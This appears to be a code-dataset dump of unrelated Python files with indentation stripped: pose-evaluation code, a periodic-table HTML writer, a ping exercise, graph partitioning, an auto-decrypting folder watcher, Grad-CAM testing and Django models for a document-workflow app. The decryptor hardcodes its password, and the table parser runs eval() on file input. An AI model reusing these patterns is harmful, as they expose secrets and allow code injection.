J24_TO_J14 = J24_TO_J17[:14]
joint_mapper_gt = J24_TO_J14
joint_mapper_h36m = H36M_TO_J14
gt_keypoints = gt_keypoints[:, joint_mapper_gt, :-1]
sio.savemat('../SPIN_MV/evaluation/S1_gt.mat',{'gt_joints17':gt_keypoints})
sio.savemat('../SPIN_MV/evaluation/S1_single_gt.mat',{'pred_joints':mpi_inf_spin['pred_joints']})
sio.savemat('../SPIN_MV/evaluation/S1_multi_gt.mat',{'pred_joints':mpi_inf_pred['pred_joints']})
""" |
7,612 | cb77696a90716acdee83a1cf6162a8f42c524e11 | #!/usr/bin/env python3
import sys
class Parse:
data = []
def __parseLine(line):
"""Parse the given line"""
# extract name
name_len = line.index(" ")
name = line[:name_len]
line = line[name_len + 3:]
# array-ize 'electron' val
elec_pos = line.index("electron") + 9
line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'
# quote 'small' val
line = line.replace(' ', '')
line = line.replace('small:', 'small:"').replace(',molar', '",molar')
# quote all keys
for i in ["position", "number", "small", "molar", "electron"]:
line = line.replace(i, '"' + i + '"')
return eval('{"name":"' + name + '",' + line + '}')
def parseFile(filename):
"""Parse the given file"""
Parse.data = []
with open(filename, "r") as f:
for line in f:
Parse.data += [Parse.__parseLine(line)]
return Parse.data
class Write:
def __writeHeader(fd):
"""Write html header"""
print(
"<!DOCTYPE html>",
"<html>",
" <head>",
" <title>Super Tableau 3000</title>",
" <meta charset='utf-8' />",
" <style>", # ty alex for css!
" table { border-collapse: collapse; }",
" td { border: solid; }",
" h4, li { font-size:10px; }",
" .empty { border: 0px; }",
" </style>",
" </head>",
" <body>",
" <table>",
sep="\n",
file=fd
)
def __writeFooter(fd):
"""Write html footer"""
print(
" </table>",
" </body>",
"</html>",
sep="\n",
file=fd
)
def __openRow(fd):
"""Write opening html table row"""
print(" <tr>", file=fd)
def __closeRow(fd):
"""Write closing html table row"""
print(" </tr>", file=fd)
def __writeElement(fd, elm):
"""Write html table cell"""
print(
" <td>",
" <h4>" + elm["name"] + "</h4>",
" <ul>",
" <li>" + str(elm["number"]) + "</li>",
" <li>" + elm["small"] + "</li>",
" <li>" + str(elm["molar"]) + "</li>",
" </ul>",
" </td>",
sep="\n",
file=fd
)
def __writeEmptyElement(fd):
"""Write html empty table cell"""
print(" <td class='empty'></td>", file=fd)
def writeFile(filename):
"""Write our awesome html file"""
with open(filename, "w") as f:
Write.__writeHeader(f)
Write.__openRow(f)
i = 0
for elm in Parse.data:
while i != elm["position"]:
Write.__writeEmptyElement(f)
i += 1
Write.__writeElement(f, elm)
i += 1
if elm["position"] == 17:
i = 0
Write.__closeRow(f)
if elm["number"] != 118:
Write.__openRow(f)
Write.__writeFooter(f)
def doTheJob(input_file):
"""Do all we need"""
Parse.parseFile(input_file)
Write.writeFile(input_file.replace(".txt", ".html"))
if __name__ == '__main__':
if len(sys.argv) == 2:
doTheJob(sys.argv[1])
else:
doTheJob("./ex07/periodic_table.txt")
|
7,613 | dd7e8556405f07172ce2b1e9f486c2cd2f4bad58 | # -*- coding: utf-8 -*-
'''
Задание 12.3
Создать функцию print_ip_table, которая отображает таблицу доступных и недоступных IP-адресов.
Функция ожидает как аргументы два списка:
* список доступных IP-адресов
* список недоступных IP-адресов
Результат работы функции - вывод на стандартный поток вывода таблицы вида:
Reachable Unreachable
----------- -------------
10.1.1.1 10.1.1.7
10.1.1.2 10.1.1.8
10.1.1.9
Функция не должна изменять списки, которые переданы ей как аргументы.
То есть, до выполнения функции и после списки должны выглядеть одинаково.
Для этого задания нет тестов
'''
import subprocess
import ipaddress
from tabulate import tabulate
def ping_ip_addresses(ip_addresses):
result1 = []
result2 = []
for ip_address in ip_addresses:
reply = subprocess.run(['ping', '-c', '3', '-n', ip_address],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding='utf-8')
if reply.returncode == 0:
result1.append(ip_address)
else:
result2.append(ip_address)
result = tuple([result1,result2])
return result
def convert_ranges_to_ip_list(list_of_ip_addresses):
result=[]
for item in list_of_ip_addresses:
source = item.split('-')
if len(source) == 1:
result.append(source[0])
else:
k = 0
source2 = source[0].split('.')
m = int(source2[3])
if len(source[1]) == 1:
k = int(source[1])
else:
source1 = source[1].split('.')
k = int(source1[3])
ip1 = ipaddress.ip_address(source[0])
for i in range(m, k+1):
result.append(str(ip1))
ip1 += 1
return result
columns = ['Reachable', 'Unreachable']
sh_ip = ping_ip_addresses(convert_ranges_to_ip_list(['8.8.4.4', '172.19.30.1-172.19.30.254']))
print(tabulate(sh_ip, headers=columns))
|
7,614 | 77d545d1a4fc5f96ae19f654a32ab75707434d46 | # encoding=utf-8
from lib.calculate_time import tic,toc
import scipy as sp
import numpy as np
from lib.make_A import make_A
from lib.make_distance import make_distance
from lib.lambda_sum_smallest import lambda_sum_smallest
from lib.fiedler import fiedler
from lib.make_al import make_al
import math
from lib.newmatrix import newmatrix
from lib.grComp import gr_comp
from lib.Divide2 import Divide2
def mainFunctionD2( Ad, vertex_num, edge_num, nodes_G, iter_times, group):
s = []
s.append(vertex_num)
if (vertex_num == 3 or edge_num < 5 or iter_times > 4 ):
print "something strange in mainfuntiond2"
return
iter=1
tic()
#the transposed matrix of Adjacent matrix
#邻接矩阵补全下三角!
size_of_Ad = Ad.shape
transposed_Ad = np.transpose(Ad)
for i in range(size_of_Ad[0]):
for j in range(size_of_Ad[1]):
Ad[i][j] = Ad[i][j] or transposed_Ad[i][j]
#得出A 有1和-1的34行78列的矩阵
A = make_A(Ad, vertex_num, edge_num)
transposed_A = np.transpose(A)
#列求和得出度矩阵B 34行一列 看成一个列表就行
B = sum(Ad)
#构造一个78*5的距离矩阵
Distance = make_distance(Ad, A, vertex_num, edge_num, B)
#变量POS记录Distance中第五行中最大值所在的位置
max_list = []
for each in Distance[:,4]:
max_list.append(each)
Pos = max_list.index(max(max_list)) + 1
#把度矩阵展开成全矩阵,并且构造拉普拉斯矩阵
D = np.diag(B)
L = np.dot(A, transposed_A)
W = Ad
L1 = D - W
cutIndexSign = 0
#构造x为L的升序特征值矩阵
eig_val,eig_vec = np.linalg.eig(L)
eig_val_list = []
for each in eig_val:
eig_val_list.append(each)
eig_val_list = sorted(eig_val_list)
x = np.array(eig_val_list)
x = np.diag(x)
#构造Q得L的正交规范化矩阵(求矩阵正交基)
Q = sp.linalg.orth(L)
#求L的费德勒向量:第二小特征值的特征向量
v = fiedler(L)
#找特征向量的特征值
lambda2 = lambda_sum_smallest(L,2)
print "ECCEM"
print "切割第"+str(iter)+"次"
#t为算法运行的时间,写入time中
t=toc()
with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/time.txt","a") as f:
f.write(str(t)+"\n")
f.close()
#求第三小的lambda
lambda3 = lambda_sum_smallest(L,3)-lambda2
aa = (v[int(Distance[Pos - 1][0])-1] - v[int(Distance[Pos - 1][1])-1]) ** 2
b1 = 1 + (2 - aa) / (lambda2 - lambda3)
low = lambda2 - aa / b1
#矩阵U是Q的转置和al的积
al = make_al(vertex_num,Distance[Pos-1][0],Distance[Pos-1][1])
transposed_Q = np.transpose(Q)
u = np.dot(transposed_Q,al)
with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/out.txt","a") as f:
f.write(str(lambda2)+"\n")
f.close()
while(lambda2>math.exp(-23)):
cutIndexSigen = 1
if( vertex_num == 1 or edge_num < 3):
break
#将矩阵中的信息A,edge_num,B进行刷新
result_list = newmatrix(Distance, A, edge_num, B, Pos)
A = result_list[0]
edge_num = result_list[1]
B = result_list[2]
Distance = make_distance(Ad, A, vertex_num, edge_num, B)
max_list = []
for each in Distance[:,4]:
max_list.append(each)
Pos = max_list.index(max(max_list)) + 1
iter = iter + 1
print "切割第" + str(iter) + "次"
D = np.diag(B)
transposed_A = np.transpose(A)
L = np.dot(A, transposed_A)
v = fiedler(L)
#有结点取为零直接跳出循环
list_B = []
for each in B:
list_B.append(each)
if(0 in list_B):
print "Distance_size[0]有节点度为0的孤立节点跳出了循环"
break
lambda2 = lambda_sum_smallest(L, 2)
#写一次时间
t=toc()
with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/time.txt","a") as f:
f.write(str(t) + "\n")
f.close()
lambda3 = lambda_sum_smallest(L,3)-lambda2
a1 = (v[int(Distance[Pos - 1][0])-1] - v[int(Distance[Pos - 1][1])-1]) ** 2
b1 = 1 + (2 - a1) / (lambda2 - lambda3)
low = lambda2 - a1 / b1
with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_data/out.txt","a") as f:
f.write(str(lambda2) + "\n")
f.close()
#构造comMatrix 就是Distance的前两行
Distance_size = Distance.shape
compMatrix = np.arange(Distance_size[0]*2).reshape(Distance_size[0],2)
i = 0
for each in Distance[:,0]:
compMatrix[i][0] = each
i = i + 1
j = 0
for each in Distance[:,1]:
compMatrix[j][1] = each
j = j + 1
ncV = gr_comp(compMatrix,vertex_num)
s.append(group)
s.append(iter_times)
with open("/home/a/PycharmProjects/TestZhu/tjufe_1/Social_Network_Graph/output_group/out.txt","a") as f:
f.write(str(s)+"\n")
f.closed
nodes_G = np.transpose(nodes_G)
result_list_of_Divide2 = D
|
7,615 | 6261d06ac7bdcb3ae25cd06338c4c41c3c5f5023 | # import time module, Observer, FileSystemEventHandler
import os
import time
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
import pyAesCrypt
import logging
logging.basicConfig(filename="Decryptor.log",
level=logging.INFO, format="%(asctime)s:%(filename)s:%(lineno)d:%(message)s")
desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
decryptor_path = desktop+"\\aes_decryptor"
if not os.path.exists(decryptor_path):
os.mkdir(decryptor_path)
class OnMyWatch:
# Set the directory on watch
watchDirectory = decryptor_path
def __init__(self):
self.observer = Observer()
def run(self):
event_handler = Handler()
self.observer.schedule(
event_handler, self.watchDirectory, recursive=True)
self.observer.start()
try:
while True:
time.sleep(5)
except:
self.observer.stop()
self.observer.join()
class Handler(FileSystemEventHandler):
@staticmethod
def on_any_event(event):
if event.is_directory:
return None
elif (event.event_type == 'created' or event.event_type == 'modified') and event.event_type != 'deleted':
# Event is modified, you can process it now
logging.info(f"Watchdog received modified event - {event.src_path}")
srcPath = event.src_path
if srcPath.find(".aes") != -1:
decrptor(srcPath)
else:
pass
else:
pass
def decrptor(srcPath):
bufferSize = 64 * 1024
password = "js198989"
try:
infile = srcPath
outfile = srcPath.replace('.aes', '')
pwd = password
buffSize = bufferSize
pyAesCrypt.decryptFile(infile, outfile, pwd, buffSize)
os.remove(infile)
return True
except Exception as ex:
logging.exception(f"ERROR-MESSAGE")
pass
if __name__ == '__main__':
logging.info("Decryptor Started Working...")
watch = OnMyWatch()
watch.run() |
7,616 | b57b6df1b7e551f64033a0c47e5a22eab9fd5fd4 | import sys
sys.path.append('.')
import torch
from torch.nn import functional as F
import os
import yaml
from src.new_grad_cam import gc
def test(conf):
device = conf['device']
dataset = conf['test_dataset']
classes = conf['data']['classes']
weights_path = conf['weights_path']
results_dir = conf['results_dir']
model = conf['model']
model.load_state_dict(torch.load(weights_path))
model = model.to(device)
model.eval()
gc(model=model,
dataset=dataset,
results_dir=results_dir,
classes=classes,
device=device)
if __name__ == '__main__':
from config import get_config
conf = get_config('./conf/testing.yaml')
test(conf) |
7,617 | 9da995184641525cd763ecdb0bca4f28159ae740 | import datetime
import os
import uuid
from abc import ABC, abstractmethod
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.contenttypes.fields import (GenericForeignKey,
GenericRelation)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from bluebird.templatetags.template_extra_filters import (plur_form,
proper_last_name)
from bluebird.tasks import calc_create_gen_async
from django_q.tasks import async_task
from .snippets import str_add_app, KLASS_TYPES, DOC_TYPE
NORM_TYPE = [
(0, '1 м2 общей площади'),
(1, '1 место'),
(2, '1 человек'),
]
POST_TYPE = [
(0, 'Клиент-менеджер'),
(1, 'Старший менеджер по работе с ЮЛ'),
(2, 'Менеджер'),
]
class Adress(models.Model):
state = models.CharField(verbose_name="Область", max_length=255)
city = models.CharField(verbose_name="Город", max_length=255)
street = models.CharField(verbose_name="Улица", max_length=255)
block = models.CharField(verbose_name="Номер дома", max_length=10)
class ContragentClass(models.Model):
name = models.CharField('Наименование', max_length=255)
class Contragent(models.Model):
"""
Класс Контрагента.
"""
# klass = models.ForeignKey(ContragentClass, on_delete=models.CASCADE)
klass = models.IntegerField(choices=KLASS_TYPES, default=0)
excell_name = models.CharField('Наименование контрагента (из Excell)',
max_length=255)
dadata_name = models.CharField('Наименование контрагента (из Dadata)',
max_length=255, blank=True, null=True)
debt = models.FloatField('Сумма задолжности', default=0.00)
debt_period = models.IntegerField('Количество неоплаченных периодов, мес.',
blank=True, null=True)
inn = models.BigIntegerField('ИНН контрагента', blank=True, null=True)
ogrn = models.BigIntegerField('ОГРН контрагента', blank=True, null=True)
kpp = models.BigIntegerField('КПП контрагента', blank=True, null=True)
rs = models.CharField('Р/с', max_length=255, blank=True, null=True)
ks = models.CharField('К/с', max_length=255, blank=True, null=True)
bank = models.CharField('Наименование банка', max_length=255, blank=True,
null=True)
bik = models.CharField('БИК', max_length=255, blank=True, null=True)
opf = models.CharField('ОПФ', max_length=255, blank=True, null=True)
director_status = models.CharField('Директор (физ. лицо либо юр. лицо)',
max_length=255, blank=True, null=True)
director_name = models.CharField('Имя либо иное наименование директора',
max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания контрагента (юл)',
blank=True, null=True)
is_func = models.BooleanField('Признак активности контрагента',
default=True)
okved = models.CharField('ОКВЭД',
max_length=255, blank=True, null=True)
# TODO REWORK THIS AREA
physical_address = models.CharField('Физический адресс',
max_length=255)
legal_address = models.CharField('Юридический адресс',
max_length=255, blank=True, null=True)
# END OF REWORK
norm_value = models.ForeignKey('NormativeCategory',
related_name='normatives',
on_delete=models.CASCADE,
blank=True, null=True)
stat_value = models.FloatField('Показатель', blank=True, null=True)
contract_accept_date = models.DateField(
'Дата начала оказания услуг',
default=datetime.date.fromisoformat('2018-07-01'),
blank=True, null=True
)
current_date = models.DateField('Конечная дата оказания услуг',
default=datetime.date.today, blank=True,
null=True)
number_contract = models.OneToOneField('ContractNumberClass',
on_delete=models.CASCADE,
max_length=255,
blank=True, null=True)
current_contract_date = models.DateField('Дата заключения договора',
blank=True, null=True)
signed_user = models.ForeignKey('SignUser', blank=True, null=True,
on_delete=models.CASCADE,
related_name='signed')
platform = models.IntegerField('№ площадки',
blank=True, null=True)
judge_link = models.CharField(verbose_name="", max_length=255,
blank=True, null=True)
fss_link = models.CharField(verbose_name="", max_length=255,
blank=True, null=True)
personal_number = models.CharField(verbose_name="Лицевой счет",
max_length=255, blank=True, null=True)
passport_number = models.CharField(verbose_name="Номер паспорта",
max_length=15, blank=True, null=True)
passport_date = models.DateField(verbose_name="Дата выдачи пасспорта",
blank=True, null=True)
passport_origin = models.CharField(verbose_name="Кем выдан пасспорт",
max_length=15, blank=True, null=True)
snils = models.CharField(verbose_name="СНИЛС",
max_length=15, blank=True, null=True)
def create_package_and_folder(self):
self.check_and_create_parent_folder()
if not os.path.isdir(self.get_str_as_path()):
os.mkdir(self.get_str_as_path(), mode=0o777)
def check_and_create_parent_folder(self):
if not os.path.isdir(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1])):
os.mkdir(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1]), mode=0o777)
def get_str_as_path(self):
return os.path.join(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1]),
f'{self.pk} {self.excell_name}')
@property
def current_user(self):
package = self.get_active_package()
if package:
res = [user for user in package.package_users.all(
) if package.package_state.is_permitted(user)]
return res
return None
@current_user.setter
def current_user(self, user):
package = self.get_active_package()
if package and not package.is_user_in_package(user, True):
package.package_users.add(user)
package.save()
@property
def active_package(self):
return self.get_active_package()
def get_all_packages(self):
return DocumentsPackage.objects.filter(contragent=self.pk) or None
def get_active_package(self):
res = DocumentsPackage.get_active_package(self)
return res
def reset_debt(self):
self.debt = 0
self.debt_period = 0
self.save()
def __str__(self):
return f'{self.excell_name}'
class Meta:
verbose_name_plural = "Контрагенты"
class SignUser(models.Model):
name = models.CharField('ФИО отвественного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE,
default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
address = models.CharField('Адресс', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE,
blank=True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/',
blank=True, null=True)
def __str__(self):
# return self.name
return f"{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}"
def save(self, *args, **kwargs):
instance = SignUser.objects.get(id=self.id)
if self.sign != instance.sign and instance.sign:
if os.path.exists(instance.sign.url):
os.remove(instance.sign.url)
super().save(*args, **kwargs)
class Meta:
verbose_name_plural = "Отвественные лица с правом подписи"
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255,
null=True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла',
blank=True, null=True)
# Подгрузка произвольного количества файлов
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel',
on_delete=models.CASCADE)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = "Единичные файлы"
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber',
on_delete=models.CASCADE,
null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = "Фаилы набора"
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
def other_files_directory_path(instance, filename):
p = instance.content_object.get_save_path()
return '{0}/прочие/{1}'.format(p, filename)
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы',
upload_to=other_files_directory_path,
max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = "Прочие файлы"
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255,
null=True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents',
related_query_name='contragent',
null=True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True,
editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)',
default=0.00)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.00)
tax_count = models.FloatField('Госпошлина', default=0.00)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия',
null=True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE,
null=True, blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(),
str(self.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return (user.department in depts) or (user in users)
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
# TODO Journal log here!
self.save()
class Meta:
verbose_name_plural = "Пакеты документов"
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel',
related_name='document_type')
states = models.ForeignKey('State', related_name='states',
on_delete=models.CASCADE,
blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate',
on_delete=models.CASCADE,
blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = "Шаблоны файлов"
# class SingleFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны единичных файлов"
# class PackFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# documents = models.ManyToManyField('DocumentTypeModel',
# related_name='document_type_pack')
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны наборов файлов"
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта',
max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name='normatives',
verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = "Категории нормативов"
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива',
null=True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива',
null=True, blank=True)
value = models.FloatField('Значение норматива (год.)',
null=True, blank=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,'
+ f' действующий с {self.since_date.strftime("%d.%m.%Y")}'
+ f' по {self.up_to_date.strftime("%d.%m.%Y")}')
class Meta:
verbose_name_plural = "Нормативы"
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{(self.date_field).year}/ТКО/01'
class Meta:
verbose_name_plural = "Сгенерированые номера договоров"
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract,
on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='',
max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool = False, exist_number: str = ''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = "Номера договоров"
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = "Номера документов"
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "Города"
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента',
choices=KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel',
verbose_name='Тип документа',
on_delete=models.CASCADE)
def __str__(self):
return f'{str(self.document_type)}|\
{KLASS_TYPES[self.contragent_type][1]}|{self.city}'
class Meta:
verbose_name_plural = "Шаблоны документов"
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255,
null=True, blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = "Типы документов"
#########
# State #
#########
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы',
related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние',
default=False)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return (user.is_superuser or user.is_staff
or self._is_dept_permitted(user.department))
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние',
blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние',
blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
##############
# Strategies #
##############
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if (not res.active_package) else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [c.department == user.department
for c in contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
